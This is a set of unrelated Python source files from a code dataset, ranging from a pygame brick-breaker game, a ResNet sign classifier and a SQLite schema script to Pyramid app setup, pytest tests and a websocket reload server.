j_finding['rrset']:\n if 'http' in rrset_item['connection']:\n h = rrset_item['connection']['http']\n\n elif 'https' in rrset_item['connection']:\n h = rrset_item['connection']['https']\n\n else:\n # HTTP stuff? GTFO\n continue\n\n # Recurse\n http_recurse(h, context)\n\n # Close it\n if args.csv_output:\n csv_file.close()\n\n csv_file = open(args.csv_output, mode='r')\n csv_reader = csv.reader(csv_file)\n cnt = 0\n for row in csv_reader:\n cnt += 1\n\n print(\"{} certificate(s) found to be expired.\".format(cnt))\n","sub_path":"query-show-expired-certificates.py","file_name":"query-show-expired-certificates.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"327011543","text":"from Rebatedor import rebatedor\nfrom Retangulo import retangulo\nfrom Bola import bola\nimport random\nimport pygame\n\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\ndarkBlue = (0, 0, 128)\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\npink = (255, 200, 200)\nblueviolet = (138, 43, 226)\ngold = (255, 215, 0)\nretangulos = []\n\n\ndef criaretangulo(x, y, largura, altura, color):\n \"\"\"Cria um objeto do tipo retangulo.\"\"\"\n return retangulo(x, y, largura, altura, color)\n\n\ndef cria_lista_retangulos(quantidade):\n \"\"\"Adiciona retangulos a lista.\"\"\"\n x = 0\n y = 0\n larg = 40\n alt = 40\n contador = 1\n while quantidade > 0:\n color = coraleatoria()\n retangulos.append(criaretangulo(x, y, larg, alt, color))\n if contador >= 10:\n x = -(larg)\n y = y + alt\n contador = 1\n else:\n contador += 1\n x += larg\n quantidade -= 1\n\n\ndef coraleatoria():\n \"\"\"Retorna uma cor aleatoria.\"\"\"\n valor = random.randint(0, 7)\n if valor == 0:\n return red\n elif valor == 1:\n return green\n elif valor == 2:\n return blue\n elif valor == 3:\n return darkBlue\n elif valor == 4:\n return white\n elif valor == 5:\n return pink\n elif valor == 6:\n return blueviolet\n elif valor == 7:\n return gold\n else:\n print(\"Erro na cor\")\n\n\ndef main():\n \"\"\"Metodo main.\"\"\"\n pygame.init()\n screen = pygame.display.set_mode((400, 400))\n rodando = True\n clock = pygame.time.Clock()\n bola1 = bola([200, 300], 15, white, 400, 400, screen)\n bola1.draw_bola(screen)\n rebatedor1 = rebatedor(150, 390, 100, 10, red, 400, 400, screen)\n rebatedor1.draw_rebatedor(screen)\n cria_lista_retangulos(40)\n for i in range(len(retangulos)):\n colora = retangulos[i].color\n xa = retangulos[i].x\n ya = retangulos[i].y\n larga = retangulos[i].largura\n alta = retangulos[i].altura\n pygame.draw.rect(screen, colora, [xa, ya, larga, alta],)\n while rodando:\n clock.tick(60)\n pygame.draw.rect(screen, black, [0, 0, 400, 400],)\n for event in pygame.event.get():\n rebatedor1.movex = 0\n if pygame.key.get_pressed()[pygame.K_UP]:\n pass\n if pygame.key.get_pressed()[pygame.K_DOWN]:\n pass\n if pygame.key.get_pressed()[pygame.K_RIGHT]:\n rebatedor1.movex = 10\n if pygame.key.get_pressed()[pygame.K_LEFT]:\n rebatedor1.movex = -10\n if pygame.key.get_pressed()[pygame.K_SPACE]:\n bola1.movex = 5\n bola1.movey = 5\n bola1.color = white\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n rodando = False\n for i in range(len(retangulos)):\n if retangulos[i].alive is True:\n colora = retangulos[i].color\n xa = retangulos[i].x\n ya = retangulos[i].y\n larga = retangulos[i].largura\n alta = retangulos[i].altura\n retangulos[i] = bola1.colide(retangulos[i])\n if retangulos[i].alive is False:\n break\n for i in range(len(retangulos)):\n if retangulos[i].alive is True:\n colora = retangulos[i].color\n xa = retangulos[i].x\n ya = retangulos[i].y\n larga = retangulos[i].largura\n alta = retangulos[i].altura\n pygame.draw.rect(screen, colora, [xa, ya, larga, alta],)\n bola1.colide(rebatedor1)\n bola1.move_bola()\n rebatedor1.move_rebatedor()\n pygame.display.flip()\n\n\nmain()\n","sub_path":"Avaliacao/Questao4/Segunda Tentativa/Prog.py","file_name":"Prog.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"207864264","text":"#!python3\n\n\"\"\"\nCreate a function that determines the length of a hypotenuse given the lengths of 2\nshorter sides\n2 input parameters\nfloat: the length of one side of a right triangle\nfloat: the length of the other side of a right triangle\n\nreturn: float value for the length of the hypotenuse\n\nSample assertions:\nassert hypotenuse(6,8) == 10\n(2 points)\n\"\"\"\n\nimport math\ndef hypotenuse(x,y):\n side1 = (x**2)\n side2 = (y**2)\n hyp = math.sqrt(side1+side2)\n return hyp\n \n\nassert hypotenuse(6,8) == 10","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"541757713","text":"from operator import itemgetter\nunsorteditems = [[1,91],[1,92],[2,93],[2,97],[1,60],[2,77],[1,65],[1,87],[1,100],[2,100],[2,76]]\ninitial_id = unsorteditems[1][0]\nsecond_id = 0\nstudent1_sum = 0\nstudent2_sum = 0\ncount1 = 1\ncount2 = 1\nitems = []\nitems = sorted(unsorteditems, key=itemgetter(1), reverse=True)\nfor i in range(len(items)):\n if (items[i][0] == initial_id) and count1 <= 5:\n student1_sum = student1_sum + int(items[i][1])\n count1 += 1\n elif count2 <= 5:\n second_id = items[i][0]\n student2_sum = student2_sum + int(items[i][1])\n count2 += 1\n\nstudent1_average = student1_sum / 5\nstudent2_average = student2_sum / 5\n\naverage_list = []\naverage_list.append([initial_id, student1_average])\naverage_list.append([second_id, student2_average])\nprint(average_list)","sub_path":"scratches/highFive.py","file_name":"highFive.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"646200361","text":"import numpy as np\nfrom matplotlib import pyplot as pp\nimport os\nimport sys\n\n##to run as follow: python pythplotEXT.py dataname param1 param2 param3 param4\n\n#extract name of data\nnamedir=sys.argv[1]\nnamedata=namedir+'.txt'\n\ntestdir=not os.path.isdir(namedir)\ntestfile=os.path.isfile(namedata)\nif testdir:\n\tif testfile:\n\t\tos.system('python dirmaker.py')\n\t\tos.system('echo ''Directory did not exist and has been created.'' ')\n\telse:\n\t\tos.system('echo ''No data available with this name.'' ')\n\t\texit()\n\n#intepretation of input\nvar=sys.argv[2:7] #var[i] is : or [number]\nabuff=sys.argv[2:7] #copy to avoid overwriting var\n\nloc1=abuff.index(':')\nabuff[loc1:loc1+1]=[]\nloc2=abuff.index(':')+1\nllist=[0,1,2,3,4]\n[pos1,pos2,pos3]=[x for x in llist if ((x!=loc1) and (x!=loc2))]\nvar1=int(var[pos1])\nvar2=int(var[pos2])\nvar3=int(var[pos3])\n\n#collect size of data\n#testtxt=not os.path.isfile(namedir+'/param_JJ_2.txt')\n#if testtxt: os.system('cp '+namedir+'/param_JJ_2 '+namedir+'/param_JJ_2.txt')\nff=open(namedir+'/param_JJ_2.txt',\"r\")\nfflines=ff.readlines()\nff.close()\n\nnstepphi=fflines[9].split('\\t')[1] #reminder: in python, remove 1 to the index of line...\nnstepB=fflines[10].split('\\t')[2]\nnstepmuSC=fflines[11].split('\\t')[1]\nnstepmu=fflines[12].split('\\t')[1]\nnstepSCm=fflines[13].split('\\t')[1]\n\nnstepphi=int(nstepphi[1:-1])\nnstepB=int(nstepB[1:-1])\nnstepmuSC=int(nstepmuSC[1:-1])\nnstepmu=int(nstepmu[1:-1])\nnstepSCm=int(nstepSCm[1:-1])\n\nnstep=[nstepphi,nstepB,nstepmuSC,nstepmu,nstepSCm]\n\n#controls the validity of input\nif ((var1<1) or (var2<1) or (var3<1)):\n\tprint(\"Indices start at 1.\")\n\texit()\nif ((var1>nstep[pos1]) or (var2>nstep[pos2]) or (var3>nstep[pos3])):\n\tprint(\"Maximal values for indices are:\",nstep)\n\texit()\n\n##extract relevant data for the specific diagram as stated in the input\n#collect the indices\nlengths=[nstep[1]*nstep[2]*nstep[3]*nstep[4],nstep[2]*nstep[3]*nstep[4],nstep[3]*nstep[4],nstep[4],1]\nstart=1+(var1-1)*lengths[pos1]+(var2-1)*lengths[pos2]+(var3-1)*lengths[pos3] #position in terms of lines\nindexsublist=[-1+start+jj*lengths[loc2]+kk*lengths[loc1] for kk in range(nstep[loc1]) for jj in range(nstep[loc2]) ]#if jj>10] #-1 for indexing & for-loops as if written with indents, ie the first changes more slowly###############################################################\n\n#collect all the values of gap\nf=open(namedir+'/'+namedata,\"r\")\nflines=f.readlines()\nfresult=[]\nfor x in flines:\n fresult.append(x.split('\\t')[5])\nf.close()\nfresult[0:1]=[] #removes the title\nnfresult=[float(fresult[i]) for i in indexsublist]\n\n#values for diagram title\nvarval1=flines[indexsublist[0]+1].split('\\t')[pos1]\nvarval2=flines[indexsublist[0]+1].split('\\t')[pos2]\nvarval3=flines[indexsublist[0]+1].split('\\t')[pos3]\n#values for diagram axis\nminx=round(float(flines[indexsublist[0]+1].split('\\t')[loc2]),2)\nminy=round(float(flines[indexsublist[0]+1].split('\\t')[loc1]),2)\nmaxx=round(float(flines[indexsublist[-1]+1].split('\\t')[loc2]),2)\nmaxy=round(float(flines[indexsublist[-1]+1].split('\\t')[loc1]),2)\nif minx==maxx:\n\tmaxx=maxx+0.1\n\tminx=minx-0.1\nelse:\n interv=(maxx-minx)/(nstep[loc2]-1)\n maxx=maxx+interv/2.\n minx=minx-interv/2.\nif miny==maxy:\n\tmaxy=maxy+0.1\n\tminy=miny-0.1\nelse:\n interv=(maxy-miny)/(nstep[loc1]-1)\n maxy=maxy+interv/2.\n miny=miny-interv/2.\n\n#reshape to plot\nnnfresult=np.asarray(nfresult).reshape(nstep[loc1],nstep[loc2])##########################################################################\nnnnfresult=np.ndarray.tolist(nnfresult)\nnnnfresult.reverse() #to flip the plot (phi increasing from bottom to top)\n\n#name of file\nvarnames=['Phi','B','muSC','mu','SCm']\ninterp='none' #interpolation = none or bilinear\n\nsm=''\nif interp=='bilinear': sm='smooth'\nplotname=namedir+varnames[loc1]+varnames[loc2]+var[pos1]+'_'+var[pos2]+'_'+var[pos3]+sm+'.png'\n\npp.figure(figsize=(9.7,6))\npp.title('Spectral gap by scattering theory for '+varnames[pos1]+'='+varval1+' , '+varnames[pos2]+'='+varval2+' and '+varnames[pos3]+'='+varval3)\npp.xlabel(varnames[loc2])\npp.ylabel(varnames[loc1])\n\n\npp.imshow(nnnfresult,cmap='hot',interpolation=interp,extent=[minx,maxx,miny,maxy],aspect='auto') \npp.colorbar()\npp.savefig(plotname)\n\nos.system('mv '+plotname+' '+namedir)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"NumSpecFortran/batches/series3/pythplotEXT.py","file_name":"pythplotEXT.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"278919618","text":"from functools import partial\n\nimport torch\nfrom torch import nn\nfrom torch.nn.modules.dropout import Dropout\nfrom torch.nn.modules.linear import Linear\nfrom torch.nn.modules.pooling import AdaptiveAvgPool2d\nfrom timm.models.resnet import resnet18, resnet34, resnet50\n\n\nENCODERS = {\n 'resnet18': {\n 'features': 512,\n 'init_op': partial(resnet18, pretrained=True),\n },\n 'resnet34': {\n 'features': 512,\n 'init_op': partial(resnet34, pretrained=True),\n },\n 'resnet50': {\n 'features': 2048,\n 'init_op': partial(resnet50, pretrained=True),\n },\n}\n\n\nclass SignsClassifier(nn.Module):\n \"\"\"\n A model for classifying signs.\n \"\"\"\n\n def __init__(self, encoder_name: str, n_classes: int, dropout_rate: float = 0.0):\n \"\"\"Initializing the class.\n\n :param encoder_name: name of the network encoder\n :param n_classes: number of output classes\n :param dropout_rate: dropout rate\n \"\"\"\n super().__init__()\n self.encoder = ENCODERS[encoder_name]['init_op']()\n self.avg_pool = AdaptiveAvgPool2d((1, 1))\n self.dropout = Dropout(dropout_rate)\n self.fc = Linear(ENCODERS[encoder_name]['features'], n_classes)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Getting the model prediction.\n\n :param x: input batch tensor\n :return: prediction\n \"\"\"\n x = self.encoder.forward_features(x)\n x = self.avg_pool(x).flatten(1)\n x = self.dropout(x)\n x = self.fc(x)\n return x\n","sub_path":"pipeline/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"181580964","text":"import matplotlib.pyplot as plt\n\n\nfile = open('max_depth_2_to_10_min_samples_split_1_to_10_percent.txt', 'r')\n#file = open('max_depth_2_to_10.txt', 'r')\ndepth = []\naccuracy = []\nmin_sample = []\n\nfor line in file:\n\trow = line.strip().split(\" \")\n\tif row[0] == \"Max\":\n\t\tdepth.append(row[2])\n\tif row[0]== \"accuracy\":\n\t\taccuracy.append(row[2].strip(\"%\"))\n\tif row[0] == \"Min\":\n\t\tmin_sample.append(row[4])\nfile.close()\n\nplt.scatter(depth , accuracy )\nplt.ylabel('Validation Accuracy')\nplt.xlabel('Depth')\nplt.show()\n\n\n","sub_path":"report/dt/3300_samples/make_plot.py","file_name":"make_plot.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"144747606","text":"\"\"\"Solve two captchas by running separate addition logic on a singular input\"\"\"\n\ndef part1(input_string):\n \"\"\"Iterate through input and value to total if the current and next numbers match\"\"\"\n total = 0\n for index, value in enumerate(input_string):\n next_index = int(index) + 1\n if next_index == len(input_string):\n next_index = 0\n if value == input_string[next_index]:\n total += int(value)\n return total\n\ndef part2(input_string):\n \"\"\"\n Iterate through input and value to total if the current and number halfway around the string match\n \"\"\"\n total = 0\n steps = int(len(input_string) / 2)\n for index, value in enumerate(input_string):\n next_index = int(index) + steps\n if next_index >= len(input_string):\n next_index -= len(input_string)\n if value == input_string[next_index]:\n total += int(value)\n return total\n\nif __name__ == '__main__':\n with open(\"input_string_day01.txt\") as f:\n INPUT_STRING = f.read()\n\n assert part1(\"1122\") == 3\n assert part1(\"1111\") == 4\n assert part1(\"1234\") == 0\n assert part1(\"91212129\") == 9\n print(f\"Part 1: {str(part1(INPUT_STRING))}\")\n\n assert part2(\"1212\") == 6\n assert part2(\"1221\") == 0\n assert part2(\"123425\") == 4\n assert part2(\"123123\") == 12\n assert part2(\"12131415\") == 4\n print(f\"Part 2: {str(part2(INPUT_STRING))}\")\n","sub_path":"day01_captcha.py","file_name":"day01_captcha.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"520230891","text":"# create_db.py\n\nimport sqlite3\n\nOBJ_DEFS = (\n '''\nCREATE TABLE IF NOT EXISTS Files (\nFileID INTEGER NOT NULL PRIMARY KEY,\nDirID INTEGER NOT NULL,\nExtID INTEGER,\nFileName TEXT,\nCommentID INTEGER,\nFileDate DATE not null default '0001-01-01',\nPages INTEGER not null default 0,\nSize INTEGER not null default 0,\nIssueDate DATE not null default '0001-01-01',\nOpened TEXT not null default '0001-01-01',\nCommented DATE not null default '0001-01-01',\nFOREIGN KEY(DirID) REFERENCES Dirs(DirID),\nFOREIGN KEY(CommentID) REFERENCES Comments(CommentID),\nFOREIGN KEY(ExtID) REFERENCES Extensions(ExtID)\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS Authors (\nAuthorID INTEGER NOT NULL PRIMARY KEY,\nAuthor TEXT\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS FileAuthor (\nFileID INTEGER NOT NULL,\nAuthorID INTEGER NOT NULL,\nprimary key(FileID, AuthorID)\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS Tags (\nTagID INTEGER NOT NULL PRIMARY KEY,\nTag TEXT\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS FileTag (\nFileID INTEGER NOT NULL,\nTagID INTEGER NOT NULL,\nprimary key(FileID, TagID)\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS Dirs (\nDirID INTEGER NOT NULL PRIMARY KEY,\nPath TEXT,\nParentID INTEGER,\nFolderType INTEGER,\nFOREIGN KEY(ParentID) REFERENCES Dirs(DirID) ON DELETE CASCADE\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS Extensions (\nExtID INTEGER NOT NULL PRIMARY KEY,\nExtension TEXT,\nGroupID INTEGER\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS ExtGroups (\nGroupID INTEGER NOT NULL PRIMARY KEY,\nGroupName TEXT\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS Comments (\nCommentID INTEGER NOT NULL PRIMARY KEY,\nComment TEXT,\nBookTitle TEXT\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS VirtDirs (\nParentID INTEGER not null,\nDirID INTEGER not null,\nFOREIGN KEY(ParentID) REFERENCES Dirs(DirID) ON DELETE CASCADE\n);''',\n\n '''\nCREATE TABLE IF NOT EXISTS VirtFiles (\nDirID INTEGER not null,\nFileID INTEGER not null,\nFOREIGN KEY(DirID) REFERENCES Dirs(DirID) ON DELETE CASCADE\n);''',\n\n 'CREATE INDEX IF NOT EXISTS Dirs_ParentID ON Dirs(ParentID);',\n)\n\n\ndef create_all_objects(connection):\n cursor = connection.cursor()\n for obj in OBJ_DEFS:\n try:\n cursor.execute(obj)\n except sqlite3.Error as err:\n print(\"create_db.create_all_objects\")\n print(err)\n return\n\n initiate_db(connection)\n\n\ndef initiate_db(connection):\n cursor = connection.cursor()\n try:\n # common root - without parent\n cursor.execute('insert into Dirs (DirID) values (0);')\n except sqlite3.Error as err:\n print(\"create_db.initiate_db\")\n print(err)\n return\n\n connection.commit()\n","sub_path":"src/core/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466401053","text":"from pyramid.config import Configurator\nfrom pyramid.events import NewRequest\nfrom papyrus.renderers import GeoJSON\n\nfrom pyramid.renderers import JSONP\n\nfrom pyramid.authentication import AuthTktAuthenticationPolicy\nfrom pyramid.authorization import ACLAuthorizationPolicy\n\nimport os\n\ndef main(global_config, **settings):\n \"\"\" This function returns a Pyramid WSGI application.\n \"\"\"\n with Configurator(settings=settings) as config:\n config.include('.models')\n config.include('pyramid_mako')\n config.include('.routes')\n config.scan()\n config.add_subscriber(add_cors_headers_response_callback, NewRequest)\n config.add_renderer('jsonp', JSONP(param_name='callback'))\n # Add the \"geojson\" renderer\n config.add_renderer(\"geojson\", GeoJSON())\n\n config.set_authentication_policy(\n AuthTktAuthenticationPolicy(\n settings[\"authtkt_secret\"],\n cookie_name=settings[\"authtkt_cookie_name\"],\n samesite=settings[\"authtk_samesite\"],\n secure=settings[\"authtk_secure\"]\n )\n )\n config.set_authorization_policy(\n ACLAuthorizationPolicy()\n )\n\n # store postal codes of canton de Neuchâtel\n config.add_settings({'npa_NE': getPostalCodesNeuchatel()})\n\n return config.make_wsgi_app()\n\n#Add Header\ndef add_cors_headers_response_callback(event):\n def cors_headers(request, response):\n response.headers.update({\n 'Access-Control-Allow-Origin': request.registry.settings['access_control_allow_origin'],\n 'Access-Control-Allow-Methods': 'POST,GET,DELETE,PUT,OPTIONS',\n 'Access-Control-Allow-Headers': 'Origin, Content-Type, Accept, Authorization',\n 'Access-Control-Allow-Credentials': 'true',\n 'Access-Control-Max-Age': '1728000',\n })\n event.request.add_response_callback(cors_headers)\n\n\n#Get NPA of canton de Neuchâtel\ndef getPostalCodesNeuchatel():\n parent_dir = os.path.dirname(os.path.abspath(__file__))\n with open(os.path.join(parent_dir, \"static\", \"npa_NE.txt\"), \"r\") as f:\n lines = f.readlines()\n npa_NE = [int(line.rstrip()) for line in lines]\n return npa_NE\n","sub_path":"back/infolica/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"100057754","text":"import datetime\nimport pytest\nfrom szurubooru import api, db, errors\nfrom szurubooru.func import util, posts\n\n@pytest.fixture\ndef test_ctx(\n tmpdir, config_injector, context_factory, post_factory, user_factory):\n config_injector({\n 'data_dir': str(tmpdir),\n 'data_url': 'http://example.com',\n 'privileges': {'comments:create': db.User.RANK_REGULAR},\n 'thumbnails': {'avatar_width': 200},\n })\n ret = util.dotdict()\n ret.context_factory = context_factory\n ret.post_factory = post_factory\n ret.user_factory = user_factory\n ret.api = api.CommentListApi()\n return ret\n\ndef test_creating_comment(test_ctx, fake_datetime):\n post = test_ctx.post_factory()\n user = test_ctx.user_factory(rank=db.User.RANK_REGULAR)\n db.session.add_all([post, user])\n db.session.flush()\n with fake_datetime('1997-01-01'):\n result = test_ctx.api.post(\n test_ctx.context_factory(\n input={'text': 'input', 'postId': post.post_id},\n user=user))\n assert result['comment']['text'] == 'input'\n assert 'id' in result['comment']\n assert 'user' in result['comment']\n assert 'post' in result['comment']\n assert 'name' in result['comment']['user']\n assert 'id' in result['comment']['post']\n comment = db.session.query(db.Comment).one()\n assert comment.text == 'input'\n assert comment.creation_time == datetime.datetime(1997, 1, 1)\n assert comment.last_edit_time is None\n assert comment.user and comment.user.user_id == user.user_id\n assert comment.post and comment.post.post_id == post.post_id\n\n@pytest.mark.parametrize('input', [\n {'text': None},\n {'text': ''},\n {'text': [None]},\n {'text': ['']},\n])\ndef test_trying_to_pass_invalid_input(test_ctx, input):\n post = test_ctx.post_factory()\n user = test_ctx.user_factory(rank=db.User.RANK_REGULAR)\n db.session.add_all([post, user])\n db.session.flush()\n real_input = {'text': 'input', 'postId': post.post_id}\n for key, value in input.items():\n real_input[key] = value\n with pytest.raises(errors.ValidationError):\n test_ctx.api.post(\n test_ctx.context_factory(input=real_input, user=user))\n\n@pytest.mark.parametrize('field', ['text', 'postId'])\ndef test_trying_to_omit_mandatory_field(test_ctx, field):\n input = {\n 'text': 'input',\n 'postId': 1,\n }\n del input[field]\n with pytest.raises(errors.ValidationError):\n test_ctx.api.post(\n test_ctx.context_factory(\n input={},\n user=test_ctx.user_factory(rank=db.User.RANK_REGULAR)))\n\ndef test_trying_to_comment_non_existing(test_ctx):\n user = test_ctx.user_factory(rank=db.User.RANK_REGULAR)\n db.session.add_all([user])\n db.session.flush()\n with pytest.raises(posts.PostNotFoundError):\n test_ctx.api.post(\n test_ctx.context_factory(\n input={'text': 'bad', 'postId': 5}, user=user))\n\ndef test_trying_to_create_without_privileges(test_ctx):\n with pytest.raises(errors.AuthError):\n test_ctx.api.post(\n test_ctx.context_factory(\n input={},\n user=test_ctx.user_factory(rank=db.User.RANK_ANONYMOUS)))\n","sub_path":"server/szurubooru/tests/api/test_comment_creating.py","file_name":"test_comment_creating.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"553848632","text":"\"\"\"\n :mod:`frbr` Models for FRBR Redis datastore\n\"\"\"\n__author__ = \"Jeremy Nelson\"\n\nimport datetime,os,logging\nimport redis,urllib2\nimport namespaces as ns\nimport common\nfrom lxml import etree\n\nFRBR_RDF_URL = 'http://metadataregistry.org/schema/show/id/5.rdf'\n\ndef load_rdf(rdf_url=FRBR_RDF_URL):\n \"\"\"\n Function takes an URL to a RDF file and creates a FRBR Redis\n datastore using key syntax of **frbr.reg_name**\n\n :param rdf_url: URL of FRBR RDF, default is FRBR_RDF_URL\n constant.\n \"\"\"\n raw_frbr_rdf = urllib2.urlopen(rdf_url).read()\n frbr_rdf = etree.XML(raw_frbr_rdf)\n rdf_descriptions = frbr_rdf.findall('{%s}Description' % \\\n ns.RDF)\n for element in rdf_descriptions:\n about_url = element.attrib['{%s}about' % ns.RDF]\n rdf_type = element.find('{%s}type' % ns.RDF)\n rdfs_label = element.find('{%s}label' % ns.RDFS)\n reg_name = element.find('{%s}name' % ns.REG)\n if reg_name is not None:\n redis_key = 'frbr.%s' % reg_name.text\n elif rdfs_label is not None:\n redis_key = 'frbr.%s' % rdfs_label.strip()\n else:\n redis_key = None\n skos_definition = element.find('{%s}definition' % ns.SKOS)\n if rdf_type is not None:\n if rdf_type.attrib.has_key('{%s}resource' % ns.RDF):\n resource_type = rdf_type.attrib['{%s}resource' % ns.RDF]\n if resource_type == 'http://www.w3.org/2002/07/owl#Class':\n common.redis_server.set(\"%s:label\" % redis_key,\n rdfs_label.text)\n common.redis_server.set(\"%s:definition\" % redis_key,\n skos_definition.text)\n print(\"Added %s with key %s to datastore\" % (rdfs_label,\n redis_key))\n\n\nclass Expression(common.BaseModel):\n \"\"\"\n :class:`Expression` class includes attributes and roles with other Entities in \n the datastore.\n \"\"\"\n\n def __init__(self,**kwargs):\n \"\"\"\n Creates an instance of :class:`Expression` \n\n :param redis_key: Redis key for FRBR Expression, default is frbr:Expression\n \"\"\" \n if not kwargs.has_key(\"redis_key\"):\n kwargs['redis_key'] = 'frbr:Expression'\n common.BaseModel.__init__(self,**kwargs)\n\nclass Item(common.BaseModel):\n \"\"\"\n :class:`Item` class includes attributes and roles with other Entities in \n the datastore.\n \"\"\"\n\n def __init__(self,**kwargs):\n \"\"\"\n Creates an instance of :class:`Item` \n\n :param redis_key: Redis key for FRBR Item, default is\n frbr:Item\n \"\"\" \n if not kwargs.has_key(\"redis_key\"):\n kwargs['redis_key'] = 'frbr:Item'\n common.BaseModel.__init__(self,**kwargs)\n\n\nclass Manifestation(common.BaseModel):\n \"\"\"\n :class:`Manifestation` class includes attributes and roles with other Entities in \n the datastore.\n \"\"\"\n\n def __init__(self,**kwargs):\n \"\"\"\n Creates an instance of :class:`Manifestation` \n\n :param redis_key: Redis key for FRBR Manifestation, default is frbr:Manifestation\n \"\"\" \n if not kwargs.has_key(\"redis_key\"):\n kwargs['redis_key'] = 'frbr:Manifestation'\n common.BaseModel.__init__(self,**kwargs)\n\n\nclass Work(common.BaseModel):\n \"\"\"\n :class:`Work` class includes attributes and roles with other Entities in \n the datastore.\n \"\"\"\n\n def __init__(self,**kwargs):\n \"\"\"\n Creates an instance of :class:`Work` \n\n :param redis_key: Redis key for FRBR Work, default is frbr:Work\n \"\"\" \n if not kwargs.has_key(\"redis_key\"):\n kwargs['redis_key'] = 'frbr:Work'\n common.BaseModel.__init__(self,**kwargs)\n\n \n","sub_path":"lib/frbr.py","file_name":"frbr.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"581759942","text":"#LinkedLists-1\n#Problem1 : https://leetcode.com/problems/linked-list-cycle-ii/\n#All test cases passed on Leetcode\n#Time Complexity-O(N) \n#Space Complexity-O(1)\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def detectCycle(self, head: ListNode) -> ListNode:\n flag=False\n slow=head\n fast=head\n #move slow pointer by 1x and fast pointer by 2x\n while fast!=None and fast.next!=None:\n slow=slow.next\n fast=fast.next.next\n #if they meet, change flag to True\n if slow==fast:\n flag=True\n break\n #if flag is still False, then there is no cycle\n if not flag:\n return None\n slow=head\n \n while slow!=fast:\n slow=slow.next\n fast=fast.next\n return fast","sub_path":"Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197362544","text":"import json\nimport cherrypy\nfrom ws4py.client.threadedclient import WebSocketClient\nfrom ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool\nfrom ws4py.messaging import TextMessage\nfrom ws4py.websocket import WebSocket\n\n\nclass BroadcastWebSocket(WebSocket):\n def received_message(self, m):\n cherrypy.log('Transmitting %s' % m)\n cherrypy.engine.publish(\n 'websocket-broadcast',\n TextMessage('%s' % m))\n\n\nclass Root(object):\n\n @cherrypy.expose\n def default(self):\n return ''\n\n def __getattr__(self, name):\n if name.startswith('_') or name == 'exposed':\n return object.__getattr__(name)\n else:\n return self.default\n\n\ndef serve_forever(host, port):\n WebSocketPlugin(cherrypy.engine).subscribe()\n cherrypy.tools.websocket = WebSocketTool()\n\n cherrypy.config.update({\n 'server.socket_host': host,\n 'server.socket_port': port\n })\n\n cherrypy.quickstart(Root(), '/', config={'/': {\n 'tools.websocket.on': True,\n 'tools.websocket.handler_cls': BroadcastWebSocket}\n })\n\n\nclass ReloadClient(WebSocketClient):\n def __init__(self, host='127.0.0.1', port=50637, endpoint='wsreload',\n protocols=None, extensions=None,\n default_query=None, open_query=None):\n WebSocketClient.__init__(\n self, 'ws://%s:%s/%s' % (host, port, endpoint),\n protocols, extensions)\n self.default_query = default_query\n self.open_query = open_query\n self.connect()\n\n def reload(self, query=None):\n self.send(json.dumps(query or self.default_query))\n\n def opened(self):\n if self.open_query:\n self.reload(self.open_query)\n\n\ndef monkey_patch_http_server(query, callback=None, **kwargs):\n from BaseHTTPServer import HTTPServer\n old_serve_forever = HTTPServer.serve_forever\n rc = ReloadClient(**kwargs)\n\n def new_serve_forever(self):\n rc.reload(query)\n if callback:\n callback(self)\n old_serve_forever(self)\n\n HTTPServer.serve_forever = new_serve_forever\n","sub_path":"wsreload/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"250749383","text":"import pandas as pd\nimport numpy as np\nimport itertools\nimport pytest\nimport pickle\nimport pyreadstat\nimport json\n# 